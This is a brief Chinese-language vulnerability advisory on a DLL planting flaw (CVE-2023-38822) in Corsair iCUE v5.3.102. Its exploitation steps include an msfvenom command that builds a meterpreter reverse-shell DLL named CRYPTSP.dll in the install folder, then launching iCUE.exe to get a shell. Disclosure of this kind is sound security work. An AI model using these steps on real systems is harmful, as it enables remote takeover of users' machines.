Corsair iCUE v.5.3.102 中的 DLL 种植漏洞(CVE-2023-38822) 发现者:Idan Malihi
Corsair iCUE v.5.3.102 中的一个问题允许本地攻击者通过 MPDC.dll、CRYPTSP.dll、dcomp.dll、profapi.dll 和 MSASN1.dll 组件执行任意代码。
要利用 DLL 种植漏洞,攻击者应执行以下步骤:
C:\Program Files\Corsair\Corsair iCUE5 Software\msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o CRYPTSP.dll
C:\Program Files\Corsair\Corsair iCUE5 Software\iCUE.exe 并获得一个反向 shell。